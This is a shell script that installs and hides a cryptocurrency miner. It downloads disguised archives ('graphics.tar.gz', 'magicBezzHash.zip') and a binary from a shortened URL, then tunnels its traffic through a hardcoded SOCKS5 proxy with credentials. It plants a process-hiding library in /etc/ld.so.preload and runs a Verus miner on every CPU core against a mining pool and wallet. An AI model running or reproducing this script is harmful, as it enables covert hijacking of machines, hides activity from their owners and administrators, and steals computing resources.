#!/bin/sh
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata

apt update;apt -y install binutils cmake build-essential screen unzip net-tools curl
apt-get install -y ca-certificates wget libcurl4 libjansson4 libgomp1

wget https://github.com/kiposnakursi/a/raw/main/graphics.tar.gz

tar -xvzf graphics.tar.gz

cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
loglevel = 1
socks5 = 45.137.80.110:9130
socks5_username = nofvbdys
socks5_password = 44tpywm4q9bo
END

./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &

sleep .2

echo " "
echo " "

echo ""

./graftcp/graftcp curl ifconfig.me

echo " "
echo " "

echo ""

echo " "
echo " "

./graftcp/graftcp wget -qO build https://git.io/JiGZh
chmod +x build

./graftcp/graftcp wget https://github.com/kiposnakursi/a/raw/main/magicBezzHash.zip
unzip magicBezzHash.zip
make
gcc -Wall -fPIC -shared -o libprocesshider.so processhider.c -ldl
mv libprocesshider.so /usr/local/lib/
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

./graftcp/graftcp ./build -a verus -o stratum+tcp://eu.luckpool.net:3956 -u RFAyGt31VDBd2MK4wWQoRsFzUXi755Ubn6.$(echo $(shuf -i 1000-99999 -n 1)0803) -p x -t $(nproc) -x socks5://nofvbdys:44tpywm4q9bo@45.137.80.110:9130
